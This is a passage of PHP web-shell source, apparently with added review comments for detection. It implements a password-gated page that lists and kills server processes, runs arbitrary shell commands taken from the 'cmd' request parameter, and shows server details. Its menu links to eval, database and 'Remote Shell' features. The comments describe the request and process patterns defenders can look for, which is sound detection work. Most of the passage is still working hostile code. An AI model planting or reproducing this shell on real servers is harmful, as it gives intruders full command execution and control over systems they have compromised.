1690 ";
1691
1692 } // task manager
// Task-manager branch: taken when the request carries `ps`.
// Optionally kills the process named by `pid`, then runs the platform's process-listing command
// through exe() and renders the output as an HTML table with a "kill" link on every row.
// exe() and ss() are defined outside this excerpt; exe() appears to run a command and return its
// output (confirm against the full file).
// NOTE(review): for detection, this branch makes the web-server account spawn `ps aux` or
// `tasklist /V /FO csv`, plus `kill -9 <pid>` / `taskkill /F /PID <pid>` when posix_kill() is
// unavailable. The matching requests look like `?ps&d=<dir>&pid=<pid>`.
1693 elseif(isset($_REQUEST['ps'])){
1694 $buff = "";
1695 // kill process specified by pid
1696 if(isset($_REQUEST['pid'])){
// NOTE(review): no numeric check on $p is visible here; in the fallback it is concatenated straight
// into the command string. The signal number is passed to posix_kill() as the string '9'.
1697 $p = ss($_REQUEST['pid']);
1698 if(function_exists("posix_kill")) $buff = (posix_kill($p,'9'))? "Process with pid ".$p." has been successfully killed":"Unable to kill process with pid ".$p;
1699 else{
1700 if(!$s_win) $buff = exe("kill -9 ".$p);
1701 else $buff = exe("taskkill /F /PID ".$p);
1702 }
1703 }
1704
// Listing command and field separator depend on the platform: space-separated ps output
// versus quoted CSV from tasklist.
1705 if(!$s_win) $h = "ps aux";
1706 else $h = "tasklist /V /FO csv";
// Initial value only; replaced below by the number of columns found in the header line.
1707 $wcount = 11;
1708 $wexplode = " ";
1709 if($s_win) $wexplode = "\",\"";
1710
1711
1712 $res = exe($h);
1713 if(trim($res)=='') $s_result = "<p class=\"rs_result\">Error getting process list</p>";
1714 else{
1715 if($buff!="") $s_result = "<p class=\"rs_result\">".$buff."</p>";
1716 $s_result .= "<table class=\"explore sortable\">";
// Collapse runs of spaces so that ps columns are separated by exactly one space.
1717 if(!$s_win) $res = preg_replace('#\ +#',' ',$res);
1718
1719 $psarr = explode("\n",$res);
1720 $fi = true;
1721 $tblcount = 0;
1722
// The first output line is treated as the header; its field count is used as the explode() limit
// so the last column of each row keeps any separators it contains.
1723 $check = explode($wexplode,$psarr[0]);
1724 $wcount = count($check);
1725
// NOTE(review): header and row fields are written into the table without HTML escaping.
1726 foreach($psarr as $psa){
1727 if(trim($psa)!=''){
1728 if($fi){
1729 $fi = false;
1730 $psln = explode($wexplode,$psa,$wcount);
1731 $s_result .= "<tr><th>action</th>";
1732 foreach($psln as $p){
1733 $s_result .= "<th>".trim(trim(strtolower($p)),"\"")."</th>";
1734 }
1735 $s_result .= "</tr>";
1736 }
1737 else{
1738 $psln = explode($wexplode,$psa,$wcount);
1739 $s_result .= "<tr>";
1740 $tblcount = 0;
1741 foreach($psln as $p){
1742 if(trim($p)=="") $p = " ";
1743 if($tblcount == 0){
// The first cell is preceded by the kill link, whose pid is the second field of the row ($psln[1]).
1744 $s_result .= "<td style=\"text-align:center;\"><a href=\"?ps&d=".$cwd."&pid=".trim(trim($psln[1]),"\"")."\">kill</a></td>
1745 <td style=\"text-align:center;\">".trim(trim($p),"\"")."</td>";
1746 $tblcount++;
1747 }
1748 else{
// Only the last column of a row is left-aligned; the others are centred.
1749 $tblcount++;
1750 if($tblcount == count($psln)) $s_result .= "<td style=\"text-align:left;\">".trim(trim($p), "\"")."</td>";
1751 else $s_result .= "<td style=\"text-align:center;\">".trim(trim($p), "\"")."</td>";
1752 }
1753 }
1754 $s_result .= "</tr>";
1755 }
1756 }
1757 }
1758 $s_result .= "</table>";
1759 }
1760 }
// Default branch, reached when none of the earlier request parameters matched: command box and listing.
// A `cmd` value of the form "cd <dir>" changes the working directory; any other non-empty value is
// passed to exe() and its output is shown HTML-escaped in a <pre>. With no command, or no output,
// the directory listing is shown instead. ss(), exe(), cp() and showdir() are defined outside this excerpt.
// NOTE(review): `cmd` is request-supplied text handed to exe() with no processing other than ss().
// For detection, this is the branch behind POSTs carrying `cmd` and `d` and, assuming exe() spawns
// the command, behind child processes of the web-server account.
1761 else{
1762 if(isset($_REQUEST['cmd'])){
1763 $cmd = ss($_REQUEST['cmd']);
1764 if(strlen($cmd) > 0){
// "cd" is handled in PHP: chdir() is called and $cwd is refreshed from getcwd().
1765 if(preg_match('#^cd(\ )+(.*)$#',$cmd,$r)){
1766 $nd = trim($r[2]);
// Try the argument as given first, then relative to the current directory.
1767 if(is_dir($nd)){
1768 chdir($nd);
1769 $cwd = cp(getcwd());
1770 $s_result .= showdir($cwd);
1771 }
1772 elseif(is_dir($cwd.$nd)){
1773 chdir($cwd.$nd);
1774 $cwd = cp(getcwd());
1775 $s_result .= showdir($cwd);
1776 }
// NOTE(review): $nd is echoed into the page unescaped in this message.
1777 else $s_result .= "<pre>".$nd." is not a directory"."</pre>";
1778 }
1779 else{
1780 $s_r = htmlspecialchars(exe($cmd));
1781 if($s_r != '') $s_result .= "<pre>".$s_r."</pre>";
1782 else $s_result .= showdir($cwd);
1783 }
1784 }
1785 else $s_result .= showdir($cwd);
1786 }
1787 else{
// $dirmsg is set outside this excerpt.
1788 if(!empty($dirmsg)) $s_result .= "<p class=\"rs_result\">".$dirmsg."</p>";
1789 $s_result .= showdir($cwd);
1790 }
1791 }
1792
1793 // print useful info
// Builds the header block that the template echoes for an authenticated session: the $s_system and
// $s_software strings, server and client IP, server time, the $letters cell and a form that jumps
// to a path through the `view` parameter.
// $s_system, $s_software, $s_server_ip, $s_my_ip, $letters, swd() and cp() are defined outside this excerpt.
// NOTE(review): $_SERVER['PHP_SELF'] and $cwd are written into attributes unescaped.
1794 $s_info = "<table class=\"headtbl\"><tr><td>".$s_system."</td></tr>";
1795 $s_info .= "<tr><td>".$s_software."</td></tr>";
1796 $s_info .= "<tr><td>server ip : ".$s_server_ip."<span class=\"gaya\"> | </span>your ip : ".$s_my_ip;
1797 $s_info .= "<span class=\"gaya\"> | </span> Time @ Server : ".date("d M Y H:i:s",time());
1798 $s_info .= "
1799 </td></tr>
1800 <tr><td style=\"text-align:left;\">
1801 <table class=\"headtbls\"><tr>
1802 <td>".trim($letters)."</td>
1803 <td>
1804 <span id=\"chpwd\">
1805 <a href=\"javascript:tukar('chpwd','chpwdform')\">
1806 <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
1807 </a>".swd($cwd)."</span>
1808 <form action=\"" . $_SERVER['PHP_SELF'] . "\" method=\"post\" style=\"margin:0;padding:0;\">
1809 <span class=\"sembunyi\" id=\"chpwdform\">
1810 <a href=\"javascript:tukar('chpwdform','chpwd');\">
1811 <img height=\"16px\" width=\"16px\" src=\"" . $_SERVER['PHP_SELF'] . "?favicon\" alt=\"Change\" style=\"vertical-align:middle;margin:6px 0;border:0;\" />
1812 </a>
1813 <input type=\"hidden\" name=\"d\" class=\"inputz\" style=\"width:300px;\" value=\"".cp($cwd)."\" />
1814 <input type=\"text\" name=\"view\" class=\"inputz\" style=\"width:300px;\" value=\"".$cwd."\" />
1815 <input class=\"inputzbut\" type=\"submit\" name=\"submit\" value=\"view file / folder\" />
1816 <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('chpwdform','chpwd');\" />
1817 </form>
1818 </span>
1819 </td></tr>
1820 </table>
1821 </td></tr>
1822 </table>";
1823}
1824?><!DOCTYPE html>
1825<html>
1826<head>
1827<title><?php echo $s_title; ?></title>
1828<meta name="robots" content="noindex, nofollow, noarchive">
1829<link rel="SHORTCUT ICON" href="<?php echo $_SERVER['PHP_SELF']."?favicon"; ?>">
1830<link href="http://fonts.googleapis.com/css?family=Ubuntu+Mono" rel="stylesheet" type="text/css">
1831<style type="text/css"><?php echo gzinflate(base64_decode($style)); ?></style>
1832<script type="text/javascript" src="<?php echo $_SERVER['PHP_SELF']."?sorttable"; ?>"></script>
1833<script type="text/javascript">
// Runs init() once the page has loaded. The body of init() is generated server-side: the call that
// focuses the element with id "cmd" is only emitted when the request carried a `cmd` parameter,
// otherwise init() is empty.
1834window.onload=function(){
1835 init();
1836}
1837function init(){<?php if(isset($_REQUEST['cmd'])) echo "if(document.getElementById('cmd')) document.getElementById('cmd').focus();"; ?>}
/**
 * Swap two page elements: hide the one with id `l` and show the one with id `b`.
 * Ids that do not resolve are skipped. If an element with id `l + '_'` exists,
 * it receives keyboard focus afterwards.
 */
function tukar(l, b) {
    var toHide = document.getElementById(l);
    if (toHide) {
        toHide.style.display = 'none';
    }

    var toShow = document.getElementById(b);
    if (toShow) {
        toShow.style.display = 'block';
    }

    var focusTarget = document.getElementById(l + '_');
    if (focusTarget) {
        focusTarget.focus();
    }
}
/**
 * Flip the visibility of the element with id `b`: 'block' becomes 'none',
 * any other display value becomes 'block'. Does nothing when the id is unknown.
 */
function toggle(b) {
    var el = document.getElementById(b);
    if (!el) {
        return;
    }
    el.style.display = (el.style.display == 'block') ? 'none' : 'block';
}
/**
 * Clear the command input (id "cmd") when it still holds the
 * '- shell command -' placeholder text; any other value is left alone.
 */
function clickcmd() {
    var field = document.getElementById('cmd');
    var showsPlaceholder = (field.value == '- shell command -');
    if (showsPlaceholder) {
        field.value = '';
    }
}
/**
 * Submit the form that owns the control `what`, then reset the control
 * to its first option. The submit happens before the reset.
 */
function download(what) {
    var ownerForm = what.form;
    ownerForm.submit();
    what.selectedIndex = 0;
}
/**
 * Stop an event from propagating to parent elements. Uses the event passed in,
 * or window.event when none is given; calls stopPropagation() when present and
 * sets the cancelBubble flag when the event object already carries one.
 */
function cancelBubble(e) {
    var evt = e || window.event;
    if (evt.stopPropagation) {
        evt.stopPropagation();
    }
    if (!(evt.cancelBubble == null)) {
        evt.cancelBubble = true;
    }
}
/**
 * Navigate to `?d=<target>` unless the user currently has text selected.
 * The selection is read through document.selection when document.all exists,
 * otherwise through document.getSelection().
 */
function xplgo(target) {
    var selected;
    if (document.all) {
        selected = document.selection.createRange().text;
    } else {
        selected = document.getSelection();
    }
    if (selected.toString().length == 0) {
        window.location = '?d=' + target;
    }
}
1866</script>
1867</head>
1868<body>
1869<table id="main"><tr><td><?php if($s_auth){ ?>
1870 <div><table id="header"><tr><td style="width:80px;"><table><tr><td><h1><a href="?"><?php echo $s_name; ?></a></h1></td></tr><tr><td style="text-align:right;"><div class="ver"><?php echo $s_ver; ?></div></td></tr></table></td>
1871 <td><div class="headinfo"><?php echo $s_info; ?></div></td></tr></table>
1872 </div>
1873 <div style="clear:both;"></div>
1874 <div id="menu">
1875 <table style="width:100%;"><tr>
1876 <td><a href="?&d=<?php echo $cwd; ?>" title="Explorer"><div class="menumi">xpl</div></a></td>
1877 <td><a href="?ps&d=<?php echo $cwd; ?>" title="Display process status"><div class="menumi">ps</div></a></td>
1878 <td><a href="?eval&d=<?php echo $cwd; ?>" title="Execute code"><div class="menumi">eval</div></a></td>
1879 <td><a href="?info&d=<?php echo $cwd; ?>" title="Information about server"><div class="menumi">info</div></a></td>
1880 <td><a href="?db&d=<?php echo $cwd; ?>" title="Connect to database"><div class="menumi">db</div></a></td>
1881 <td><a href="?rs&d=<?php echo $cwd; ?>" title="Remote Shell"><div class="menumi">rs</div></a></td>
1882 <td style="width:100%;padding:0 0 0 6px;">
1883 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"><span class="prompt"><?php echo $s_prompt; ?></span>
1884 <input id="cmd" onclick="clickcmd();" class="inputz" type="text" name="cmd" style="width:70%;" value="<?php
1885if(isset($_REQUEST['cmd'])) echo "";
1886else echo "- shell command -";
1887?>" />
1888 <noscript><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:80px;" /></noscript>
1889 <input type="hidden" name="d" value="<?php echo $cwd; ?>" />
1890 </form>
1891 </td>
1892 </tr>
1893 </table>
1894 </div>
1895 <div id="content" id="box_shell">
1896 <div id="result"><?php echo $s_result; ?></div>
1897 </div><?php }
1898else{ ?>
1899 <div style="width:100%;text-align:center;">
1900
1901 <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
1902 <img src="?favicon" style="margin:2px;vertical-align:middle;" />
1903 <?php echo $s_name; ?> <span class="gaya"><?php echo $s_ver; ?></span><input id="login" class="inputz" type="password" name="login" style="width:120px;" value="" />
1904 <input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" />
1905 </form>
1906 </div>
1907
1908<?php } ?>
1909</td></tr></table>
1910<p class="footer">Jayalah Indonesiaku ©<?php echo date("Y",time())." ".$s_name; ?> ( <?php
1911$mtime = explode(" ",microtime());
1912$s_end = (float)$mtime[0] + (float)$mtime[1]; // to calculate script execution time
1913echo round($s_end-$s_start,3); ?> secs )</p>
1914</body>
1915</html>